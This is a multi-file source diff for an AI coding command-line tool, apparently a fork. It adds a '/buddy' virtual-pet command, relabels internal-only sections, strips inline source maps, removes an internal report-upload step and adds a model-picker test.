+// biome-ignore-all assist/source/organizeImports: internal-only import markers must not be reordered
import addDir from './commands/add-dir/index.js'
import autofixPr from './commands/autofix-pr/index.js'
import backfillSessions from './commands/backfill-sessions/index.js'
@@ -59,6 +59,7 @@ import usage from './commands/usage/index.js'
import theme from './commands/theme/index.js'
import vim from './commands/vim/index.js'
import { feature } from 'bun:bundle'
+import { isBuddyEnabled } from './buddy/feature.js'
// Dead code elimination: conditional imports
/* eslint-disable @typescript-eslint/no-require-imports */
const proactive =
@@ -117,7 +118,7 @@ const forkCmd = feature('FORK_SUBAGENT')
require('./commands/fork/index.js') as typeof import('./commands/fork/index.js')
).default
: null
-const buddy = feature('BUDDY')
+const buddy = isBuddyEnabled()
? (
require('./commands/buddy/index.js') as typeof import('./commands/buddy/index.js')
).default

File diff suppressed because one or more lines are too long
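The conditional-import pattern in the commands index above relies on dead code elimination: when the flag is a compile-time-constant false, the bundler can drop both the branch and the module it would have required. A minimal runnable sketch of that technique; `isForkEnabled`, `loadCommand`, and the `Command` type are illustrative stand-ins for the real `feature()` / `require()` wiring.

```typescript
type Command = { name: string }

function isForkEnabled(): boolean {
  return false // statically false -> the load branch below is never taken
}

// Loader only runs when the flag is on; with a constant-false flag a bundler
// can eliminate the branch and the module it would load as dead code.
function loadCommand(load: () => Command): Command | null {
  return isForkEnabled() ? load() : null
}

// The loader callback stands in for require('./commands/fork/index.js').default.
// It never executes, so the "module" is never loaded.
const forkCmd = loadCommand(() => {
  throw new Error('module should never be loaded')
})
console.log(forkCmd) // → null
```

The same shape explains the `buddy` case: replacing `feature('BUDDY')` with a plain function returning `true` keeps the branch live while preserving the lazy-require structure.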


@@ -9,4 +9,3 @@ export async function call(onDone: LocalJSXCommandOnDone, context: ToolUseContex
const tools = getTools(permissionContext);
return <AgentsMenu tools={tools} onExit={onDone} />;
}
-//# sourceMappingURL=data:application/json;charset=utf-8;base64,…

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long


@@ -0,0 +1,185 @@
import type { LocalJSXCommandContext, LocalJSXCommandOnDone } from '../../types/command.js'
import { getGlobalConfig, saveGlobalConfig } from '../../utils/config.js'
import { companionUserId, getCompanion, rollWithSeed } from '../../buddy/companion.js'
import type { StoredCompanion } from '../../buddy/types.js'
import { COMMON_HELP_ARGS, COMMON_INFO_ARGS } from '../../constants/xml.js'

const NAME_PREFIXES = [
  'Byte',
  'Echo',
  'Glint',
  'Miso',
  'Nova',
  'Pixel',
  'Rune',
  'Static',
  'Vector',
  'Whisk',
] as const

const NAME_SUFFIXES = [
  'bean',
  'bit',
  'bud',
  'dot',
  'ling',
  'loop',
  'moss',
  'patch',
  'puff',
  'spark',
] as const

const PERSONALITIES = [
  'Curious and quietly encouraging',
  'A patient little watcher with strong debugging instincts',
  'Playful, observant, and suspicious of flaky tests',
  'Calm under pressure and fond of clean diffs',
  'A tiny terminal gremlin who likes successful builds',
] as const

const PET_REACTIONS = [
  'leans into the headpat',
  'does a proud little bounce',
  'emits a content beep',
  'looks delighted',
  'wiggles happily',
] as const

function hashString(s: string): number {
  let h = 2166136261
  for (let i = 0; i < s.length; i++) {
    h ^= s.charCodeAt(i)
    h = Math.imul(h, 16777619)
  }
  return h >>> 0
}

function pickDeterministic<T>(items: readonly T[], seed: string): T {
  return items[hashString(seed) % items.length]!
}

function titleCase(s: string): string {
  return s.charAt(0).toUpperCase() + s.slice(1)
}

function createStoredCompanion(): StoredCompanion {
  const userId = companionUserId()
  const { bones } = rollWithSeed(`${userId}:buddy`)
  const prefix = pickDeterministic(NAME_PREFIXES, `${userId}:prefix`)
  const suffix = pickDeterministic(NAME_SUFFIXES, `${userId}:suffix`)
  const personality = pickDeterministic(PERSONALITIES, `${userId}:personality`)
  return {
    name: `${prefix}${suffix}`,
    personality: `${personality}.`,
    hatchedAt: Date.now(),
  }
}

function setCompanionReaction(
  context: LocalJSXCommandContext,
  reaction: string | undefined,
  pet = false,
): void {
  context.setAppState(prev => ({
    ...prev,
    companionReaction: reaction,
    companionPetAt: pet ? Date.now() : prev.companionPetAt,
  }))
}

function showHelp(onDone: LocalJSXCommandOnDone): void {
  onDone(
    'Usage: /buddy [status|mute|unmute]\n\nRun /buddy with no args to hatch your companion the first time, then pet it on later runs.',
    { display: 'system' },
  )
}

export async function call(
  onDone: LocalJSXCommandOnDone,
  context: LocalJSXCommandContext,
  args?: string,
): Promise<null> {
  const arg = args?.trim().toLowerCase() ?? ''
  if (COMMON_HELP_ARGS.includes(arg) || arg === '') {
    const existing = getCompanion()
    if (arg !== '' || existing) {
      if (arg !== '') {
        showHelp(onDone)
        return null
      }
    }
  }
  if (COMMON_HELP_ARGS.includes(arg)) {
    showHelp(onDone)
    return null
  }
  if (COMMON_INFO_ARGS.includes(arg) || arg === 'status') {
    const companion = getCompanion()
    if (!companion) {
      onDone('No buddy hatched yet. Run /buddy to hatch one.', {
        display: 'system',
      })
      return null
    }
    onDone(
      `${companion.name} is your ${titleCase(companion.rarity)} ${companion.species}. ${companion.personality}`,
      { display: 'system' },
    )
    return null
  }
  if (arg === 'mute' || arg === 'unmute') {
    const muted = arg === 'mute'
    saveGlobalConfig(current => ({
      ...current,
      companionMuted: muted,
    }))
    if (muted) {
      setCompanionReaction(context, undefined)
    }
    onDone(`Buddy ${muted ? 'muted' : 'unmuted'}.`, { display: 'system' })
    return null
  }
  if (arg !== '') {
    showHelp(onDone)
    return null
  }
  let companion = getCompanion()
  if (!companion) {
    const stored = createStoredCompanion()
    saveGlobalConfig(current => ({
      ...current,
      companion: stored,
      companionMuted: false,
    }))
    companion = {
      ...rollWithSeed(`${companionUserId()}:buddy`).bones,
      ...stored,
    }
    setCompanionReaction(
      context,
      `${companion.name} the ${companion.species} has hatched.`,
      true,
    )
    onDone(
      `${companion.name} the ${companion.species} is now your buddy. Run /buddy again to pet them.`,
      { display: 'system' },
    )
    return null
  }
  const reaction = `${companion.name} ${pickDeterministic(
    PET_REACTIONS,
    `${Date.now()}:${companion.name}`,
  )}`
  setCompanionReaction(context, reaction, true)
  onDone(undefined, { display: 'skip' })
  return null
}


@@ -0,0 +1,12 @@
import type { Command } from '../../commands.js'

const buddy = {
  type: 'local-jsx',
  name: 'buddy',
  description: 'Hatch, pet, and manage your Open Claude companion',
  immediate: true,
  argumentHint: '[status|mute|unmute|help]',
  load: () => import('./buddy.js'),
} satisfies Command

export default buddy

File diff suppressed because one or more lines are too long


@@ -4,4 +4,3 @@ import type { LocalJSXCommandCall } from '../../types/command.js';
export const call: LocalJSXCommandCall = async (onDone, context) => {
return <Settings onClose={onDone} context={context} defaultTab="Config" />;
};
-//# sourceMappingURL=data:application/json;charset=utf-8;base64,…


@@ -199,13 +199,13 @@ function formatContextAsMarkdownTable(data: ContextData): string {
output += `\n`
}
-// System tools (ant-only)
+// System tools (internal-only)
if (
systemTools &&
systemTools.length > 0 &&
process.env.USER_TYPE === 'ant'
) {
-output += `### [ANT-ONLY] System Tools\n\n`
+output += `### [internal] System Tools\n\n`
output += `| Tool | Tokens |\n`
output += `|------|--------|\n`
for (const tool of systemTools) {
@@ -214,13 +214,13 @@ function formatContextAsMarkdownTable(data: ContextData): string {
output += `\n`
}
-// System prompt sections (ant-only)
+// System prompt sections (internal-only)
if (
systemPromptSections &&
systemPromptSections.length > 0 &&
process.env.USER_TYPE === 'ant'
) {
-output += `### [ANT-ONLY] System Prompt Sections\n\n`
+output += `### [internal] System Prompt Sections\n\n`
output += `| Section | Tokens |\n`
output += `|---------|--------|\n`
for (const section of systemPromptSections) {
@@ -288,9 +288,9 @@ function formatContextAsMarkdownTable(data: ContextData): string {
output += `\n`
}
-// Message breakdown (ant-only)
+// Message breakdown (internal-only)
if (messageBreakdown && process.env.USER_TYPE === 'ant') {
-output += `### [ANT-ONLY] Message Breakdown\n\n`
+output += `### [internal] Message Breakdown\n\n`
output += `| Category | Tokens |\n`
output += `|----------|--------|\n`
output += `| Tool calls | ${formatTokens(messageBreakdown.toolCallTokens)} |\n`

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long


@@ -16,7 +16,7 @@ export const call: LocalCommandCall = async () => {
} }
if (process.env.USER_TYPE === 'ant') { if (process.env.USER_TYPE === 'ant') {
value += `\n\n[ANT-ONLY] Showing cost anyway:\n ${formatTotalCost()}` value += `\n\n[internal-only] Showing cost anyway:\n ${formatTotalCost()}`
} }
return { type: 'text', value } return { type: 'text', value }
} }


@@ -6,4 +6,3 @@ export async function call(onDone: (result?: string, options?: {
}) => void): Promise<React.ReactNode> {
return <DesktopHandoff onDone={onDone} />;
}
-//# sourceMappingURL=data:application/json;charset=utf-8;base64,…


@@ -6,4 +6,3 @@ export const call: LocalJSXCommandCall = async (onDone, context) => {
} = await import('../../components/diff/DiffDialog.js');
return <DiffDialog messages={context.messages} onDone={onDone} />;
};
-//# sourceMappingURL=data:application/json;charset=utf-8;base64,…


@@ -4,4 +4,3 @@ import type { LocalJSXCommandCall } from '../../types/command.js';
export const call: LocalJSXCommandCall = (onDone, _context, _args) => {
return Promise.resolve(<Doctor onDone={onDone} />);
};
-//# sourceMappingURL=data:application/json;charset=utf-8;base64,…

File diff suppressed because one or more lines are too long


@@ -30,4 +30,3 @@ export async function call(onDone: LocalJSXCommandOnDone): Promise<React.ReactNo
await gracefulShutdown(0, 'prompt_input_exit');
return null;
}
-//# sourceMappingURL=data:application/json;charset=utf-8;base64,…

File diff suppressed because one or more lines are too long


@@ -14,4 +14,3 @@ export async function call(onDone: LocalJSXCommandOnDone, context: LocalJSXComma
onDone(success ? 'Login successful' : 'Login interrupted');
}} />;
}
-//# sourceMappingURL=data:application/json;charset=utf-8;base64,…

File diff suppressed because one or more lines are too long


@@ -22,4 +22,3 @@ export async function call(onDone: LocalJSXCommandOnDone, context: LocalJSXComma
const initialDescription = args || '';
return renderFeedbackComponent(onDone, context.abortController.signal, context.messages, initialDescription);
}
-//# sourceMappingURL=data:application/json;charset=utf-8;base64,…


@@ -8,4 +8,3 @@ export const call: LocalJSXCommandCall = async (onDone, {
}) => {
  return <HelpV2 commands={commands} onClose={onDone} />;
};


@@ -10,4 +10,3 @@ export const call: LocalJSXCommandCall = async (onDone, context) => {
  const toolNames = getTools(permissionContext).map(tool => tool.name);
  return <HooksConfigMenu toolNames={toolNames} onExit={onDone} />;
};

File diff suppressed because one or more lines are too long


@@ -70,7 +70,7 @@ If the user chose personal CLAUDE.local.md or both: ask about them, not the code
 - Only if Phase 2 found multiple git worktrees: ask whether their worktrees are nested inside the main repo (e.g., \`.claude/worktrees/<name>/\`) or siblings/external (e.g., \`../myrepo-feature/\`). If nested, the upward file walk finds the main repo's CLAUDE.local.md automatically — no special handling needed. If sibling/external, the personal content should live in a home-directory file (e.g., \`~/.claude/<project-name>-instructions.md\`) and each worktree gets a one-line CLAUDE.local.md stub that imports it: \`@~/.claude/<project-name>-instructions.md\`. Never put this import in the project CLAUDE.md — that would check a personal reference into the team-shared file.
 - Any communication preferences? (e.g., "be terse", "always explain tradeoffs", "don't summarize at the end")
-**Synthesize a proposal from Phase 2 findings** — e.g., format-on-edit if a formatter exists, a \`/verify\` skill if tests exist, a CLAUDE.md note for anything from the gap-fill answers that's a guideline rather than a workflow. For each, pick the artifact type that fits, **constrained by the Phase 1 skills+hooks choice**:
+**Synthesize a proposal from Phase 2 findings** — e.g., format-on-edit if a formatter exists, a project verification workflow if tests exist, a CLAUDE.md note for anything from the gap-fill answers that's a guideline rather than a workflow. For each, pick the artifact type that fits, **constrained by the Phase 1 skills+hooks choice**:
 - **Hook** (stricter) — deterministic shell command on a tool event; Claude can't skip it. Fits mechanical, fast, per-edit steps: formatting, linting, running a quick test on the changed file.
 - **Skill** (on-demand) — you or Claude invoke \`/skill-name\` when you want it. Fits workflows that don't belong on every edit: deep verification, session reports, deploys.
@@ -85,7 +85,7 @@ If the user chose personal CLAUDE.local.md or both: ask about them, not the code
 - **Keep previews compact — the preview box truncates with no scrolling.** One line per item, no blank lines between items, no header. Example preview content:
 • **Format-on-edit hook** (automatic) — \`ruff format <file>\` via PostToolUse
-• **/verify skill** (on-demand) — \`make lint && make typecheck && make test\`
+• **Verification workflow** (on-demand) — \`make lint && make typecheck && make test\`
 • **CLAUDE.md note** (guideline) — "run lint/typecheck/test before marking done"
 - Option labels stay short ("Looks good", "Drop the hook", "Drop the skill") — the tool auto-adds an "Other" free-text option, so don't add your own catch-all.
@@ -157,7 +157,7 @@ Skills add capabilities Claude can use on demand without bloating every session.
 **First, consume \`skill\` entries from the Phase 3 preference queue.** Each queued skill preference becomes a SKILL.md tailored to what the user described. For each:
 - Name it from the preference (e.g., "verify-deep", "session-report", "deploy-sandbox")
-- Write the body using the user's own words from the interview plus whatever Phase 2 found (test commands, report format, deploy target). If the preference maps to an existing bundled skill (e.g., \`/verify\`), write a project skill that adds the user's specific constraints on top — tell the user the bundled one still exists and theirs is additive.
+- Write the body using the user's own words from the interview plus whatever Phase 2 found (test commands, report format, deploy target). If the preference maps to an existing project workflow, write a project skill that captures the user's specific constraints on top.
 - Ask a quick follow-up if the preference is underspecified (e.g., "which test command should verify-deep run?")
 **Then suggest additional skills** beyond the queue when you find:

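The "hook (stricter)" artifact type this prompt describes maps onto the hooks section of Claude Code's `settings.json`. As an illustrative sketch only (the `Edit|Write` matcher, the `jq`/`ruff format` command, and the `tool_input.file_path` field are assumptions to check against the hooks documentation for your version), the format-on-edit hook from the example preview could look like:

```json
{
  "hooks": {
    "PostToolUse": [
      {
        "matcher": "Edit|Write",
        "hooks": [
          {
            "type": "command",
            "command": "jq -r '.tool_input.file_path' | xargs ruff format"
          }
        ]
      }
    ]
  }
}
```

Because the hook is a deterministic shell command fired on the tool event, it cannot be skipped, which is exactly the property the "stricter" option above relies on.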

@@ -2187,7 +2187,7 @@ function generateHtmlReport(
`
: ''
-// Build Team Feedback section (collapsible, ant-only)
+// Build Team Feedback section (collapsible, internal-only)
const ccImprovements =
process.env.USER_TYPE === 'ant'
? insights.cc_team_improvements?.improvements || []
@@ -2804,7 +2804,7 @@ export async function generateUsageReport(options?: {
}> {
let remoteStats: { hosts: RemoteHostInfo[]; totalCopied: number } | undefined
-// Optionally collect data from remote hosts first (ant-only)
+// Optionally collect data from remote hosts first (internal-only)
if (process.env.USER_TYPE === 'ant' && options?.collectRemote) {
const destDir = join(getClaudeConfigHomeDir(), 'projects')
const { hosts, totalCopied } = await collectAllRemoteHostData(destDir)
@@ -3072,33 +3072,6 @@ const usageReport: Command = {
let reportUrl = `file://${htmlPath}`
let uploadHint = ''
if (process.env.USER_TYPE === 'ant') {
// Try to upload to S3
const timestamp = new Date()
.toISOString()
.replace(/[-:]/g, '')
.replace('T', '_')
.slice(0, 15)
const username = process.env.SAFEUSER || process.env.USER || 'unknown'
const filename = `${username}_insights_${timestamp}.html`
const s3Path = `s3://anthropic-serve/atamkin/cc-user-reports/${filename}`
const s3Url = `https://s3-frontend.infra.ant.dev/anthropic-serve/atamkin/cc-user-reports/${filename}`
reportUrl = s3Url
try {
execFileSync('ff', ['cp', htmlPath, s3Path], {
timeout: 60000,
stdio: 'pipe', // Suppress output
})
} catch {
// Upload failed - fall back to local file and show upload command
reportUrl = `file://${htmlPath}`
uploadHint = `\nAutomatic upload failed. Are you on the boron namespace? Try \`use-bo\` and ensure you've run \`sso\`.
To share, run: ff cp ${htmlPath} ${s3Path}
Then access at: ${s3Url}`
}
}
// Build header with stats // Build header with stats
const sessionLabel =
data.total_sessions_scanned &&
@@ -3112,7 +3085,7 @@ Then access at: ${s3Url}`
`${data.git_commits} commits`,
].join(' · ')
-// Build remote host info (ant-only)
+// Build remote host info (internal-only)
let remoteInfo = ''
if (process.env.USER_TYPE === 'ant') {
if (remoteStats && remoteStats.totalCopied > 0) {

File diff suppressed because one or more lines are too long



@@ -12,4 +12,3 @@ export function CheckGitHubStep() {
  }
  return t0;
}

File diff suppressed because one or more lines are too long



@@ -0,0 +1,42 @@
import { afterEach, expect, mock, test } from 'bun:test'
const originalEnv = {
CLAUDE_CODE_USE_OPENAI: process.env.CLAUDE_CODE_USE_OPENAI,
OPENAI_BASE_URL: process.env.OPENAI_BASE_URL,
OPENAI_MODEL: process.env.OPENAI_MODEL,
}
afterEach(() => {
mock.restore()
process.env.CLAUDE_CODE_USE_OPENAI = originalEnv.CLAUDE_CODE_USE_OPENAI
process.env.OPENAI_BASE_URL = originalEnv.OPENAI_BASE_URL
process.env.OPENAI_MODEL = originalEnv.OPENAI_MODEL
})
test('opens the model picker without awaiting local model discovery refresh', async () => {
process.env.CLAUDE_CODE_USE_OPENAI = '1'
process.env.OPENAI_BASE_URL = 'http://127.0.0.1:8080/v1'
process.env.OPENAI_MODEL = 'qwen2.5-coder-7b-instruct'
let resolveDiscovery: (() => void) | undefined
const discoverOpenAICompatibleModelOptions = mock(
() =>
new Promise<void>(resolve => {
resolveDiscovery = resolve
}),
)
mock.module('../../utils/model/openaiModelDiscovery.js', () => ({
discoverOpenAICompatibleModelOptions,
}))
const { call } = await import(`./model.js?ts=${Date.now()}-${Math.random()}`)
const result = await Promise.race([
call(() => {}, {} as never, ''),
new Promise(resolve => setTimeout(() => resolve('timeout'), 50)),
])
resolveDiscovery?.()
expect(result).not.toBe('timeout')
})
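The regression test above combines two generic patterns: a cache-busting dynamic import (`./model.js?ts=...`) so the module re-evaluates with the mocked discovery in place, and `Promise.race` against a short timer to assert that a call settles without awaiting a still-pending promise. A minimal sketch of the race pattern, with illustrative names not taken from the diff:

```typescript
// Race fn() against a timer: resolves to fn()'s value if it settles
// within ms milliseconds, otherwise to the literal string 'timeout'.
async function settlesWithin<T>(
  fn: () => Promise<T>,
  ms: number,
): Promise<T | 'timeout'> {
  return Promise.race([
    fn(),
    new Promise<'timeout'>(resolve => setTimeout(() => resolve('timeout'), ms)),
  ])
}

async function demo(): Promise<void> {
  // A call that resolves immediately wins the race.
  const fast = await settlesWithin(async () => 'opened picker', 50)
  // A promise that never settles loses to the timer.
  const hung = await settlesWithin(() => new Promise<never>(() => {}), 50)
  console.log(fast, hung) // → opened picker timeout
}

demo()
```

The test asserts the inverse of `hung`: the `/model` call must not be the arm that loses to the timer, proving the picker opens without blocking on discovery.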

File diff suppressed because one or more lines are too long


@@ -4,4 +4,3 @@ export async function call(onDone: LocalJSXCommandOnDone): Promise<undefined> {
display: 'system'
});
}


@@ -21,4 +21,3 @@ export async function call(onDone: LocalJSXCommandOnDone): Promise<React.ReactNo
});
return <Passes onDone={onDone} />;
}


@@ -7,4 +7,3 @@ export const call: LocalJSXCommandCall = async (onDone, context) => {
context.setMessages(prev => [...prev, createPermissionRetryMessage(commands)]);
}} />;
};

File diff suppressed because one or more lines are too long



@@ -29,4 +29,3 @@ export function PluginTrustWarning() {
  }
  return t2;
}

Some files were not shown because too many files have changed in this diff.